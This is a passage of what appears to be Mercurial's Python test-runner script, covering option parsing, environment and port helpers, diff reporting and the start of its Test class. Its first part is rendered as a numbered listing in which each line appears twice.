120 testpattern = r'[\w-]+\.(t|py)(#[a-zA-Z0-9_\-\.]+)?'
121 tokens = {
121 tokens = {
122 'root': [
122 'root': [
123 (r'^Skipped', token.Generic.Skipped, 'skipped'),
123 (r'^Skipped', token.Generic.Skipped, 'skipped'),
124 (r'^Failed ', token.Generic.Failed, 'failed'),
124 (r'^Failed ', token.Generic.Failed, 'failed'),
125 (r'^ERROR: ', token.Generic.Failed, 'failed'),
125 (r'^ERROR: ', token.Generic.Failed, 'failed'),
126 ],
126 ],
127 'skipped': [
127 'skipped': [
128 (testpattern, token.Generic.SName),
128 (testpattern, token.Generic.SName),
129 (r':.*', token.Generic.Skipped),
129 (r':.*', token.Generic.Skipped),
130 ],
130 ],
131 'failed': [
131 'failed': [
132 (testpattern, token.Generic.FName),
132 (testpattern, token.Generic.FName),
133 (r'(:| ).*', token.Generic.Failed),
133 (r'(:| ).*', token.Generic.Failed),
134 ],
134 ],
135 }
135 }
136
136
137 runnerformatter = formatters.Terminal256Formatter(style=TestRunnerStyle)
137 runnerformatter = formatters.Terminal256Formatter(style=TestRunnerStyle)
138 runnerlexer = TestRunnerLexer()
138 runnerlexer = TestRunnerLexer()
139
139
140 origenviron = os.environ.copy()
140 origenviron = os.environ.copy()
141
141
142 if sys.version_info > (3, 5, 0):
142 if sys.version_info > (3, 5, 0):
143 PYTHON3 = True
143 PYTHON3 = True
144 xrange = range # we use xrange in one place, and we'd rather not use range
144 xrange = range # we use xrange in one place, and we'd rather not use range
145
145
146 def _bytespath(p):
146 def _bytespath(p):
147 if p is None:
147 if p is None:
148 return p
148 return p
149 return p.encode('utf-8')
149 return p.encode('utf-8')
150
150
151 def _strpath(p):
151 def _strpath(p):
152 if p is None:
152 if p is None:
153 return p
153 return p
154 return p.decode('utf-8')
154 return p.decode('utf-8')
155
155
156 osenvironb = getattr(os, 'environb', None)
156 osenvironb = getattr(os, 'environb', None)
157 if osenvironb is None:
157 if osenvironb is None:
158 # Windows lacks os.environb, for instance. A proxy over the real thing
158 # Windows lacks os.environb, for instance. A proxy over the real thing
159 # instead of a copy allows the environment to be updated via bytes on
159 # instead of a copy allows the environment to be updated via bytes on
160 # all platforms.
160 # all platforms.
161 class environbytes(object):
161 class environbytes(object):
162 def __init__(self, strenv):
162 def __init__(self, strenv):
163 self.__len__ = strenv.__len__
163 self.__len__ = strenv.__len__
164 self.clear = strenv.clear
164 self.clear = strenv.clear
165 self._strenv = strenv
165 self._strenv = strenv
166
166
167 def __getitem__(self, k):
167 def __getitem__(self, k):
168 v = self._strenv.__getitem__(_strpath(k))
168 v = self._strenv.__getitem__(_strpath(k))
169 return _bytespath(v)
169 return _bytespath(v)
170
170
171 def __setitem__(self, k, v):
171 def __setitem__(self, k, v):
172 self._strenv.__setitem__(_strpath(k), _strpath(v))
172 self._strenv.__setitem__(_strpath(k), _strpath(v))
173
173
174 def __delitem__(self, k):
174 def __delitem__(self, k):
175 self._strenv.__delitem__(_strpath(k))
175 self._strenv.__delitem__(_strpath(k))
176
176
177 def __contains__(self, k):
177 def __contains__(self, k):
178 return self._strenv.__contains__(_strpath(k))
178 return self._strenv.__contains__(_strpath(k))
179
179
180 def __iter__(self):
180 def __iter__(self):
181 return iter([_bytespath(k) for k in iter(self._strenv)])
181 return iter([_bytespath(k) for k in iter(self._strenv)])
182
182
183 def get(self, k, default=None):
183 def get(self, k, default=None):
184 v = self._strenv.get(_strpath(k), _strpath(default))
184 v = self._strenv.get(_strpath(k), _strpath(default))
185 return _bytespath(v)
185 return _bytespath(v)
186
186
187 def pop(self, k, default=None):
187 def pop(self, k, default=None):
188 v = self._strenv.pop(_strpath(k), _strpath(default))
188 v = self._strenv.pop(_strpath(k), _strpath(default))
189 return _bytespath(v)
189 return _bytespath(v)
190
190
191 osenvironb = environbytes(os.environ)
191 osenvironb = environbytes(os.environ)
192
192
193 getcwdb = getattr(os, 'getcwdb')
193 getcwdb = getattr(os, 'getcwdb')
194 if not getcwdb or os.name == 'nt':
194 if not getcwdb or os.name == 'nt':
195 getcwdb = lambda: _bytespath(os.getcwd())
195 getcwdb = lambda: _bytespath(os.getcwd())
196
196
197 elif sys.version_info >= (3, 0, 0):
197 elif sys.version_info >= (3, 0, 0):
198 print(
198 print(
199 '%s is only supported on Python 3.5+ and 2.7, not %s'
199 '%s is only supported on Python 3.5+ and 2.7, not %s'
200 % (sys.argv[0], '.'.join(str(v) for v in sys.version_info[:3]))
200 % (sys.argv[0], '.'.join(str(v) for v in sys.version_info[:3]))
201 )
201 )
202 sys.exit(70) # EX_SOFTWARE from `man 3 sysexits`
202 sys.exit(70) # EX_SOFTWARE from `man 3 sysexits`
203 else:
203 else:
204 PYTHON3 = False
204 PYTHON3 = False
205
205
206 # In python 2.x, path operations are generally done using
206 # In python 2.x, path operations are generally done using
207 # bytestrings by default, so we don't have to do any extra
207 # bytestrings by default, so we don't have to do any extra
208 # fiddling there. We define the wrapper functions anyway just to
208 # fiddling there. We define the wrapper functions anyway just to
209 # help keep code consistent between platforms.
209 # help keep code consistent between platforms.
210 def _bytespath(p):
210 def _bytespath(p):
211 return p
211 return p
212
212
213 _strpath = _bytespath
213 _strpath = _bytespath
214 osenvironb = os.environ
214 osenvironb = os.environ
215 getcwdb = os.getcwd
215 getcwdb = os.getcwd
216
216
217 # For Windows support
217 # For Windows support
218 wifexited = getattr(os, "WIFEXITED", lambda x: False)
218 wifexited = getattr(os, "WIFEXITED", lambda x: False)
219
219
220 # Whether to use IPv6
220 # Whether to use IPv6
221 def checksocketfamily(name, port=20058):
221 def checksocketfamily(name, port=20058):
222 """return true if we can listen on localhost using family=name
222 """return true if we can listen on localhost using family=name
223
223
224 name should be either 'AF_INET', or 'AF_INET6'.
224 name should be either 'AF_INET' or 'AF_INET6'.
224 name should be either 'AF_INET' or 'AF_INET6'.
225 port being used is okay - EADDRINUSE is considered successful.
225 port being used is okay - EADDRINUSE is considered successful.
226 """
227 family = getattr(socket, name, None)
227 family = getattr(socket, name, None)
228 if family is None:
228 if family is None:
229 return False
229 return False
230 try:
230 try:
231 s = socket.socket(family, socket.SOCK_STREAM)
231 s = socket.socket(family, socket.SOCK_STREAM)
232 s.bind(('localhost', port))
232 s.bind(('localhost', port))
233 s.close()
233 s.close()
234 return True
234 return True
235 except socket.error as exc:
235 except socket.error as exc:
236 if exc.errno == errno.EADDRINUSE:
236 if exc.errno == errno.EADDRINUSE:
237 return True
237 return True
238 elif exc.errno in (errno.EADDRNOTAVAIL, errno.EPROTONOSUPPORT):
238 elif exc.errno in (errno.EADDRNOTAVAIL, errno.EPROTONOSUPPORT):
239 return False
239 return False
240 else:
240 else:
241 raise
241 raise
242 else:
242 else:
243 return False
243 return False
244
244
245
245
246 # useipv6 will be set by parseargs
246 # useipv6 will be set by parseargs
247 useipv6 = None
247 useipv6 = None
248
248
249
249
250 def checkportisavailable(port):
250 def checkportisavailable(port):
251 """return true if a port seems free to bind on localhost"""
251 """return true if a port seems free to bind on localhost"""
252 if useipv6:
252 if useipv6:
253 family = socket.AF_INET6
253 family = socket.AF_INET6
254 else:
254 else:
255 family = socket.AF_INET
255 family = socket.AF_INET
256 try:
256 try:
257 s = socket.socket(family, socket.SOCK_STREAM)
257 s = socket.socket(family, socket.SOCK_STREAM)
258 s.bind(('localhost', port))
258 s.bind(('localhost', port))
259 s.close()
259 s.close()
260 return True
260 return True
261 except socket.error as exc:
261 except socket.error as exc:
262 if exc.errno not in (
262 if exc.errno not in (
263 errno.EADDRINUSE,
263 errno.EADDRINUSE,
264 errno.EADDRNOTAVAIL,
264 errno.EADDRNOTAVAIL,
265 errno.EPROTONOSUPPORT,
265 errno.EPROTONOSUPPORT,
266 ):
266 ):
267 raise
267 raise
268 return False
268 return False
269
269
270
270
271 closefds = os.name == 'posix'
271 closefds = os.name == 'posix'
272
272
273
273
274 def Popen4(cmd, wd, timeout, env=None):
274 def Popen4(cmd, wd, timeout, env=None):
275 processlock.acquire()
275 processlock.acquire()
276 p = subprocess.Popen(
276 p = subprocess.Popen(
277 _strpath(cmd),
277 _strpath(cmd),
278 shell=True,
278 shell=True,
279 bufsize=-1,
279 bufsize=-1,
280 cwd=_strpath(wd),
280 cwd=_strpath(wd),
281 env=env,
281 env=env,
282 close_fds=closefds,
282 close_fds=closefds,
283 stdin=subprocess.PIPE,
283 stdin=subprocess.PIPE,
284 stdout=subprocess.PIPE,
284 stdout=subprocess.PIPE,
285 stderr=subprocess.STDOUT,
285 stderr=subprocess.STDOUT,
286 )
286 )
287 processlock.release()
287 processlock.release()
288
288
289 p.fromchild = p.stdout
289 p.fromchild = p.stdout
290 p.tochild = p.stdin
290 p.tochild = p.stdin
291 p.childerr = p.stderr
291 p.childerr = p.stderr
292
292
293 p.timeout = False
293 p.timeout = False
294 if timeout:
294 if timeout:
295
295
296 def t():
296 def t():
297 start = time.time()
297 start = time.time()
298 while time.time() - start < timeout and p.returncode is None:
298 while time.time() - start < timeout and p.returncode is None:
299 time.sleep(0.1)
299 time.sleep(0.1)
300 p.timeout = True
300 p.timeout = True
301 if p.returncode is None:
301 if p.returncode is None:
302 terminate(p)
302 terminate(p)
303
303
304 threading.Thread(target=t).start()
304 threading.Thread(target=t).start()
305
305
306 return p
306 return p
307
307
308
308
309 if sys.executable:
309 if sys.executable:
310 sysexecutable = sys.executable
310 sysexecutable = sys.executable
311 elif os.environ.get('PYTHONEXECUTABLE'):
311 elif os.environ.get('PYTHONEXECUTABLE'):
312 sysexecutable = os.environ['PYTHONEXECUTABLE']
312 sysexecutable = os.environ['PYTHONEXECUTABLE']
313 elif os.environ.get('PYTHON'):
313 elif os.environ.get('PYTHON'):
314 sysexecutable = os.environ['PYTHON']
314 sysexecutable = os.environ['PYTHON']
315 else:
315 else:
316 raise AssertionError('Could not find Python interpreter')
316 raise AssertionError('Could not find Python interpreter')
317
317
318 PYTHON = _bytespath(sysexecutable.replace('\\', '/'))
318 PYTHON = _bytespath(sysexecutable.replace('\\', '/'))
319 IMPL_PATH = b'PYTHONPATH'
319 IMPL_PATH = b'PYTHONPATH'
320 if 'java' in sys.platform:
320 if 'java' in sys.platform:
321 IMPL_PATH = b'JYTHONPATH'
321 IMPL_PATH = b'JYTHONPATH'
322
322
323 defaults = {
323 defaults = {
324 'jobs': ('HGTEST_JOBS', multiprocessing.cpu_count()),
324 'jobs': ('HGTEST_JOBS', multiprocessing.cpu_count()),
325 'timeout': ('HGTEST_TIMEOUT', 180),
325 'timeout': ('HGTEST_TIMEOUT', 180),
326 'slowtimeout': ('HGTEST_SLOWTIMEOUT', 1500),
326 'slowtimeout': ('HGTEST_SLOWTIMEOUT', 1500),
327 'port': ('HGTEST_PORT', 20059),
327 'port': ('HGTEST_PORT', 20059),
328 'shell': ('HGTEST_SHELL', 'sh'),
328 'shell': ('HGTEST_SHELL', 'sh'),
329 }
329 }
330
330
331
331
332 def canonpath(path):
332 def canonpath(path):
333 return os.path.realpath(os.path.expanduser(path))
333 return os.path.realpath(os.path.expanduser(path))
334
334
335
335
336 def parselistfiles(files, listtype, warn=True):
336 def parselistfiles(files, listtype, warn=True):
337 entries = dict()
337 entries = dict()
338 for filename in files:
338 for filename in files:
339 try:
339 try:
340 path = os.path.expanduser(os.path.expandvars(filename))
340 path = os.path.expanduser(os.path.expandvars(filename))
341 f = open(path, "rb")
341 f = open(path, "rb")
342 except IOError as err:
342 except IOError as err:
343 if err.errno != errno.ENOENT:
343 if err.errno != errno.ENOENT:
344 raise
344 raise
345 if warn:
345 if warn:
346 print("warning: no such %s file: %s" % (listtype, filename))
346 print("warning: no such %s file: %s" % (listtype, filename))
347 continue
347 continue
348
348
349 for line in f.readlines():
349 for line in f.readlines():
350 line = line.split(b'#', 1)[0].strip()
350 line = line.split(b'#', 1)[0].strip()
351 if line:
351 if line:
352 entries[line] = filename
352 entries[line] = filename
353
353
354 f.close()
354 f.close()
355 return entries
355 return entries


def parsettestcases(path):
    """read a .t test file, return a set of test case names

    If path does not exist, return an empty set.
    """
    cases = []
    try:
        with open(path, 'rb') as f:
            for l in f:
                if l.startswith(b'#testcases '):
                    cases.append(sorted(l[11:].split()))
    except IOError as ex:
        if ex.errno != errno.ENOENT:
            raise
    return cases
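# Illustrative .t directive recognized by parsettestcases(): a line such as
#
#   #testcases safe normal
#
# contributes the entry [b'normal', b'safe'] (the names are split and sorted).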


def getparser():
    """Obtain the OptionParser used by the CLI."""
    parser = argparse.ArgumentParser(usage='%(prog)s [options] [tests]')

    selection = parser.add_argument_group('Test Selection')
    selection.add_argument(
        '--allow-slow-tests',
        action='store_true',
        help='allow extremely slow tests',
    )
    selection.add_argument(
        "--blacklist",
        action="append",
        help="skip tests listed in the specified blacklist file",
    )
    selection.add_argument(
        "--changed",
        help="run tests that are changed in parent rev or working directory",
    )
    selection.add_argument(
        "-k", "--keywords", help="run tests matching keywords"
    )
    selection.add_argument(
        "-r", "--retest", action="store_true", help="retest failed tests"
    )
    selection.add_argument(
        "--test-list",
        action="append",
        help="read tests to run from the specified file",
    )
    selection.add_argument(
        "--whitelist",
        action="append",
        help="always run tests listed in the specified whitelist file",
    )
    selection.add_argument(
        'tests', metavar='TESTS', nargs='*', help='Tests to run'
    )

    harness = parser.add_argument_group('Test Harness Behavior')
    harness.add_argument(
        '--bisect-repo',
        metavar='bisect_repo',
        help=(
            "Path of a repo to bisect. Use together with " "--known-good-rev"
        ),
    )
    harness.add_argument(
        "-d",
        "--debug",
        action="store_true",
        help="debug mode: write output of test scripts to console"
        " rather than capturing and diffing it (disables timeout)",
    )
    harness.add_argument(
        "-f",
        "--first",
        action="store_true",
        help="exit on the first test failure",
    )
    harness.add_argument(
        "-i",
        "--interactive",
        action="store_true",
        help="prompt to accept changed output",
    )
    harness.add_argument(
        "-j",
        "--jobs",
        type=int,
        help="number of jobs to run in parallel"
        " (default: $%s or %d)" % defaults['jobs'],
    )
    harness.add_argument(
        "--keep-tmpdir",
        action="store_true",
        help="keep temporary directory after running tests",
    )
    harness.add_argument(
        '--known-good-rev',
        metavar="known_good_rev",
        help=(
            "Automatically bisect any failures using this "
            "revision as a known-good revision."
        ),
    )
    harness.add_argument(
        "--list-tests",
        action="store_true",
        help="list tests instead of running them",
    )
    harness.add_argument(
        "--loop", action="store_true", help="loop tests repeatedly"
    )
    harness.add_argument(
        '--random', action="store_true", help='run tests in random order'
    )
    harness.add_argument(
        '--order-by-runtime',
        action="store_true",
        help='run slowest tests first, according to .testtimes',
    )
    harness.add_argument(
        "-p",
        "--port",
        type=int,
        help="port on which servers should listen"
        " (default: $%s or %d)" % defaults['port'],
    )
    harness.add_argument(
        '--profile-runner',
        action='store_true',
        help='run statprof on run-tests',
    )
    harness.add_argument(
        "-R", "--restart", action="store_true", help="restart at last error"
    )
    harness.add_argument(
        "--runs-per-test",
        type=int,
        dest="runs_per_test",
        help="run each test N times (default=1)",
        default=1,
    )
    harness.add_argument(
        "--shell", help="shell to use (default: $%s or %s)" % defaults['shell']
    )
    harness.add_argument(
        '--showchannels', action='store_true', help='show scheduling channels'
    )
    harness.add_argument(
        "--slowtimeout",
        type=int,
        help="kill errant slow tests after SLOWTIMEOUT seconds"
        " (default: $%s or %d)" % defaults['slowtimeout'],
    )
    harness.add_argument(
        "-t",
        "--timeout",
        type=int,
        help="kill errant tests after TIMEOUT seconds"
        " (default: $%s or %d)" % defaults['timeout'],
    )
    harness.add_argument(
        "--tmpdir",
        help="run tests in the given temporary directory"
        " (implies --keep-tmpdir)",
    )
    harness.add_argument(
        "-v", "--verbose", action="store_true", help="output verbose messages"
    )

    hgconf = parser.add_argument_group('Mercurial Configuration')
    hgconf.add_argument(
        "--chg",
        action="store_true",
        help="install and use chg wrapper in place of hg",
    )
    hgconf.add_argument("--compiler", help="compiler to build with")
    hgconf.add_argument(
        '--extra-config-opt',
        action="append",
        default=[],
        help='set the given config opt in the test hgrc',
    )
    hgconf.add_argument(
        "-l",
        "--local",
        action="store_true",
        help="shortcut for --with-hg=<testdir>/../hg, "
        "and --with-chg=<testdir>/../contrib/chg/chg if --chg is set",
    )
    hgconf.add_argument(
        "--ipv6",
        action="store_true",
        help="prefer IPv6 to IPv4 for network related tests",
    )
    hgconf.add_argument(
        "--pure",
        action="store_true",
        help="use pure Python code instead of C extensions",
    )
    hgconf.add_argument(
        "-3",
        "--py3-warnings",
        action="store_true",
        help="enable Py3k warnings on Python 2.7+",
    )
    hgconf.add_argument(
        "--with-chg",
        metavar="CHG",
        help="use specified chg wrapper in place of hg",
    )
    hgconf.add_argument(
        "--with-hg",
        metavar="HG",
        help="test using specified hg script rather than a "
        "temporary installation",
    )

    reporting = parser.add_argument_group('Results Reporting')
    reporting.add_argument(
        "-C",
        "--annotate",
        action="store_true",
        help="output files annotated with coverage",
    )
    reporting.add_argument(
        "--color",
        choices=["always", "auto", "never"],
        default=os.environ.get('HGRUNTESTSCOLOR', 'auto'),
        help="colorisation: always|auto|never (default: auto)",
    )
    reporting.add_argument(
        "-c",
        "--cover",
        action="store_true",
        help="print a test coverage report",
    )
    reporting.add_argument(
        '--exceptions',
        action='store_true',
        help='log all exceptions and generate an exception report',
    )
    reporting.add_argument(
        "-H",
        "--htmlcov",
        action="store_true",
        help="create an HTML report of the coverage of the files",
    )
    reporting.add_argument(
        "--json",
        action="store_true",
        help="store test result data in 'report.json' file",
    )
    reporting.add_argument(
        "--outputdir",
        help="directory to write error logs to (default=test directory)",
    )
    reporting.add_argument(
        "-n", "--nodiff", action="store_true", help="skip showing test changes"
    )
    reporting.add_argument(
        "-S",
        "--noskips",
        action="store_true",
        help="don't report skip tests verbosely",
    )
    reporting.add_argument(
        "--time", action="store_true", help="time how long each test takes"
    )
    reporting.add_argument("--view", help="external diff viewer")
    reporting.add_argument(
        "--xunit", help="record xunit results at specified path"
    )

    for option, (envvar, default) in defaults.items():
        defaults[option] = type(default)(os.environ.get(envvar, default))
    parser.set_defaults(**defaults)

    return parser


def parseargs(args, parser):
    """Parse arguments with our OptionParser and validate results."""
    options = parser.parse_args(args)

    # jython and pypy are always pure
    if 'java' in sys.platform or '__pypy__' in sys.modules:
        options.pure = True

    if options.local:
        if options.with_hg or options.with_chg:
            parser.error('--local cannot be used with --with-hg or --with-chg')
        testdir = os.path.dirname(_bytespath(canonpath(sys.argv[0])))
        reporootdir = os.path.dirname(testdir)
        pathandattrs = [(b'hg', 'with_hg')]
        if options.chg:
            pathandattrs.append((b'contrib/chg/chg', 'with_chg'))
        for relpath, attr in pathandattrs:
            binpath = os.path.join(reporootdir, relpath)
            if os.name != 'nt' and not os.access(binpath, os.X_OK):
                parser.error(
                    '--local specified, but %r not found or '
                    'not executable' % binpath
                )
            setattr(options, attr, _strpath(binpath))

    if options.with_hg:
        options.with_hg = canonpath(_bytespath(options.with_hg))
        if not (
            os.path.isfile(options.with_hg)
            and os.access(options.with_hg, os.X_OK)
        ):
            parser.error('--with-hg must specify an executable hg script')
        if os.path.basename(options.with_hg) not in [b'hg', b'hg.exe']:
            sys.stderr.write('warning: --with-hg should specify an hg script\n')
            sys.stderr.flush()

    if (options.chg or options.with_chg) and os.name == 'nt':
        parser.error('chg does not work on %s' % os.name)
    if options.with_chg:
        options.chg = False  # no installation to temporary location
        options.with_chg = canonpath(_bytespath(options.with_chg))
        if not (
            os.path.isfile(options.with_chg)
            and os.access(options.with_chg, os.X_OK)
        ):
            parser.error('--with-chg must specify a chg executable')
    if options.chg and options.with_hg:
        # chg shares installation location with hg
        parser.error(
            '--chg does not work when --with-hg is specified '
            '(use --with-chg instead)'
        )

    if options.color == 'always' and not pygmentspresent:
        sys.stderr.write(
            'warning: --color=always ignored because '
            'pygments is not installed\n'
        )

    if options.bisect_repo and not options.known_good_rev:
        parser.error("--bisect-repo cannot be used without --known-good-rev")

    global useipv6
    if options.ipv6:
        useipv6 = checksocketfamily('AF_INET6')
    else:
        # only use IPv6 if IPv4 is unavailable and IPv6 is available
        useipv6 = (not checksocketfamily('AF_INET')) and checksocketfamily(
            'AF_INET6'
        )

    options.anycoverage = options.cover or options.annotate or options.htmlcov
    if options.anycoverage:
        try:
            import coverage

            covver = version.StrictVersion(coverage.__version__).version
            if covver < (3, 3):
                parser.error('coverage options require coverage 3.3 or later')
        except ImportError:
            parser.error('coverage options now require the coverage package')

    if options.anycoverage and options.local:
        # this needs some path mangling somewhere, I guess
        parser.error(
            "sorry, coverage options do not work when --local " "is specified"
        )

    if options.anycoverage and options.with_hg:
        parser.error(
            "sorry, coverage options do not work when --with-hg " "is specified"
        )

    global verbose
    if options.verbose:
        verbose = ''

    if options.tmpdir:
        options.tmpdir = canonpath(options.tmpdir)

    if options.jobs < 1:
        parser.error('--jobs must be positive')
    if options.interactive and options.debug:
        parser.error("-i/--interactive and -d/--debug are incompatible")
    if options.debug:
        if options.timeout != defaults['timeout']:
            sys.stderr.write('warning: --timeout option ignored with --debug\n')
        if options.slowtimeout != defaults['slowtimeout']:
            sys.stderr.write(
                'warning: --slowtimeout option ignored with --debug\n'
            )
        options.timeout = 0
        options.slowtimeout = 0
    if options.py3_warnings:
        if PYTHON3:
            parser.error('--py3-warnings can only be used on Python 2.7')

    if options.blacklist:
        options.blacklist = parselistfiles(options.blacklist, 'blacklist')
    if options.whitelist:
        options.whitelisted = parselistfiles(options.whitelist, 'whitelist')
    else:
        options.whitelisted = {}

    if options.showchannels:
        options.nodiff = True

    return options
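# Minimal illustrative use of the two helpers above, with hypothetical
# command-line arguments:
#
#   parser = getparser()
#   options = parseargs(['--jobs', '2', 'test-commit.t'], parser)
#   # options.jobs == 2 and options.tests == ['test-commit.t']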


def rename(src, dst):
    """Like os.rename(), but trades atomicity and opened-files friendliness
    for the ability to replace an existing destination.
    """
    shutil.copy(src, dst)
    os.remove(src)


def makecleanable(path):
    """Try to fix directory permissions recursively so that the entire tree
    can be deleted"""
    for dirpath, dirnames, _filenames in os.walk(path, topdown=True):
        for d in dirnames:
            p = os.path.join(dirpath, d)
            try:
                os.chmod(p, os.stat(p).st_mode & 0o777 | 0o700)  # chmod u+rwx
            except OSError:
                pass


_unified_diff = difflib.unified_diff
if PYTHON3:
    import functools

    _unified_diff = functools.partial(difflib.diff_bytes, difflib.unified_diff)


def getdiff(expected, output, ref, err):
    servefail = False
    lines = []
    for line in _unified_diff(expected, output, ref, err):
        if line.startswith(b'+++') or line.startswith(b'---'):
            line = line.replace(b'\\', b'/')
            if line.endswith(b' \n'):
                line = line[:-2] + b'\n'
        lines.append(line)
        if not servefail and line.startswith(
            b'+ abort: child process failed to start'
        ):
            servefail = True

    return servefail, lines
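# Illustrative call, assuming lists of bytes lines: getdiff([b'a\n'], [b'b\n'],
# b'test-x.t', b'test-x.t.err') yields (False, <unified diff lines>); the
# first element only becomes True when the diff contains the tell-tale
# "+ abort: child process failed to start" server failure line.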


verbose = False


def vlog(*msg):
    """Log only when in verbose mode."""
    if verbose is False:
        return

    return log(*msg)


# Bytes that break XML even in a CDATA block: control characters 0-31
# sans \t, \n and \r
CDATA_EVIL = re.compile(br"[\000-\010\013\014\016-\037]")

# Match feature conditionalized output lines in the form, capturing the feature
# list in group 2, and the preceding line output in group 1:
#
#   output..output (feature !)\n
optline = re.compile(br'(.*) \((.+?) !\)\n$')
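# For example, the reference output line b'  listing keys (sshv1 !)\n'
# matches optline with group(1) == b'  listing keys' and group(2) == b'sshv1'.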


def cdatasafe(data):
    """Make a string safe to include in a CDATA block.

    Certain control characters are illegal in a CDATA block, and
    there's no way to include a ]]> in a CDATA either. This function
    replaces illegal bytes with ? and adds a space between the ]] so
    that it won't break the CDATA block.
    """
    return CDATA_EVIL.sub(b'?', data).replace(b']]>', b'] ]>')
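# For example, cdatasafe(b'ok\x00]]>done') returns b'ok?] ]>done': the NUL
# byte becomes '?' and the ']]>' terminator is split so the surrounding
# CDATA block stays well formed.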


def log(*msg):
    """Log something to stdout.

    Arguments are strings to print.
    """
    with iolock:
        if verbose:
            print(verbose, end=' ')
        for m in msg:
            print(m, end=' ')
        print()
        sys.stdout.flush()


def highlightdiff(line, color):
    if not color:
        return line
    assert pygmentspresent
    return pygments.highlight(
        line.decode('latin1'), difflexer, terminal256formatter
    ).encode('latin1')


def highlightmsg(msg, color):
    if not color:
        return msg
    assert pygmentspresent
    return pygments.highlight(msg, runnerlexer, runnerformatter)


def terminate(proc):
    """Terminate subprocess"""
    vlog('# Terminating process %d' % proc.pid)
    try:
        proc.terminate()
    except OSError:
        pass


def killdaemons(pidfile):
    import killdaemons as killmod

    return killmod.killdaemons(pidfile, tryhard=False, remove=True, logfn=vlog)


class Test(unittest.TestCase):
    """Encapsulates a single, runnable test.

    While this class conforms to the unittest.TestCase API, it differs in that
    instances need to be instantiated manually. (Typically, unittest.TestCase
    classes are instantiated automatically by scanning modules.)
    """

    # Status code reserved for skipped tests (used by hghave).
    SKIPPED_STATUS = 80

    def __init__(
        self,
        path,
        outputdir,
        tmpdir,
        keeptmpdir=False,
        debug=False,
        first=False,
        timeout=None,
        startport=None,
        extraconfigopts=None,
        py3warnings=False,
        shell=None,
        hgcommand=None,
        slowtimeout=None,
        usechg=False,
        useipv6=False,
    ):
        """Create a test from parameters.

        path is the full path to the file defining the test.

        tmpdir is the main temporary directory to use for this test.

        keeptmpdir determines whether to keep the test's temporary directory
        after execution. It defaults to removal (False).

        debug mode will make the test execute verbosely, with unfiltered
        output.

        timeout controls the maximum run time of the test. It is ignored when
        debug is True. See slowtimeout for tests with #require slow.

        slowtimeout overrides timeout if the test has #require slow.

        startport controls the starting port number to use for this test. Each
        test will reserve 3 port numbers for execution. It is the caller's
        responsibility to allocate a non-overlapping port range to Test
        instances.

        extraconfigopts is an iterable of extra hgrc config options. Values
        must have the form "key=value" (something understood by hgrc). Values
        of the form "foo.key=value" will result in "[foo] key=value".

        py3warnings enables Py3k warnings.

        shell is the shell to execute tests in.
        """
        if timeout is None:
            timeout = defaults['timeout']
        if startport is None:
            startport = defaults['port']
        if slowtimeout is None:
            slowtimeout = defaults['slowtimeout']
        self.path = path
        self.bname = os.path.basename(path)
        self.name = _strpath(self.bname)
        self._testdir = os.path.dirname(path)
        self._outputdir = outputdir
        self._tmpname = os.path.basename(path)
        self.errpath = os.path.join(self._outputdir, b'%s.err' % self.bname)

        self._threadtmp = tmpdir
        self._keeptmpdir = keeptmpdir
        self._debug = debug
        self._first = first
        self._timeout = timeout
        self._slowtimeout = slowtimeout
        self._startport = startport
        self._extraconfigopts = extraconfigopts or []
        self._py3warnings = py3warnings
        self._shell = _bytespath(shell)
        self._hgcommand = hgcommand or b'hg'
        self._usechg = usechg
        self._useipv6 = useipv6

        self._aborted = False
        self._daemonpids = []
        self._finished = None
        self._ret = None
        self._out = None
        self._skipped = None
        self._testtmp = None
        self._chgsockdir = None

        self._refout = self.readrefout()

    def readrefout(self):
        """read reference output"""
        # If we're not in --debug mode and reference output file exists,
        # check test output against it.
        if self._debug:
            return None  # to match "out is None"
        elif os.path.exists(self.refpath):
            with open(self.refpath, 'rb') as f:
                return f.read().splitlines(True)
        else:
            return []

    # needed to get base class __repr__ running
    @property
    def _testMethodName(self):
        return self.name

    def __str__(self):
        return self.name

    def shortDescription(self):
        return self.name

    def setUp(self):
        """Tasks to perform before run()."""
        self._finished = False
        self._ret = None
        self._out = None
        self._skipped = None

        try:
            os.mkdir(self._threadtmp)
        except OSError as e:
            if e.errno != errno.EEXIST:
                raise

        name = self._tmpname
        self._testtmp = os.path.join(self._threadtmp, name)
        os.mkdir(self._testtmp)

        # Remove any previous output files.
        if os.path.exists(self.errpath):
            try:
                os.remove(self.errpath)
            except OSError as e:
                # We might have raced another test to clean up a .err
                # file, so ignore ENOENT when removing a previous .err
                # file.
                if e.errno != errno.ENOENT:
                    raise

        if self._usechg:
            self._chgsockdir = os.path.join(
                self._threadtmp, b'%s.chgsock' % name
            )
            os.mkdir(self._chgsockdir)

    def run(self, result):
        """Run this test and report results against a TestResult instance."""
        # This function is extremely similar to unittest.TestCase.run(). Once
        # we require Python 2.7 (or at least its version of unittest), this
        # function can largely go away.
        self._result = result
        result.startTest(self)
        try:
            try:
                self.setUp()
            except (KeyboardInterrupt, SystemExit):
                self._aborted = True
                raise
            except Exception:
                result.addError(self, sys.exc_info())
                return

            success = False
            try:
                self.runTest()
            except KeyboardInterrupt:
                self._aborted = True
                raise
            except unittest.SkipTest as e:
                result.addSkip(self, str(e))
                # The base class will have already counted this as a
                # test we "ran", but we want to exclude skipped tests
                # from those we count towards those run.
                result.testsRun -= 1
            except self.failureException as e:
                # This differs from unittest in that we don't capture
                # the stack trace. This is for historical reasons and
                # this decision could be revisited in the future,
                # especially for PythonTest instances.
                if result.addFailure(self, str(e)):
                    success = True
            except Exception:
                result.addError(self, sys.exc_info())
            else:
                success = True

            try:
                self.tearDown()
            except (KeyboardInterrupt, SystemExit):
                self._aborted = True
                raise
            except Exception:
                result.addError(self, sys.exc_info())
                success = False

            if success:
                result.addSuccess(self)
        finally:
            result.stopTest(self, interrupted=self._aborted)

    def runTest(self):
        """Run this test instance.

        This will return a tuple describing the result of the test.
        """
        env = self._getenv()
        self._genrestoreenv(env)
        self._daemonpids.append(env['DAEMON_PIDS'])
        self._createhgrc(env['HGRCPATH'])

        vlog('# Test', self.name)

        ret, out = self._run(env)
        self._finished = True
        self._ret = ret
        self._out = out

        def describe(ret):
            if ret < 0:
                return 'killed by signal: %d' % -ret
            return 'returned error code %d' % ret

        self._skipped = False

        if ret == self.SKIPPED_STATUS:
            if out is None:  # Debug mode, nothing to parse.
                missing = ['unknown']
                failed = None
            else:
                missing, failed = TTest.parsehghaveoutput(out)

            if not missing:
                missing = ['skipped']

            if failed:
                self.fail('hg have failed checking for %s' % failed[-1])
            else:
                self._skipped = True
                raise unittest.SkipTest(missing[-1])
        elif ret == 'timeout':
            self.fail('timed out')
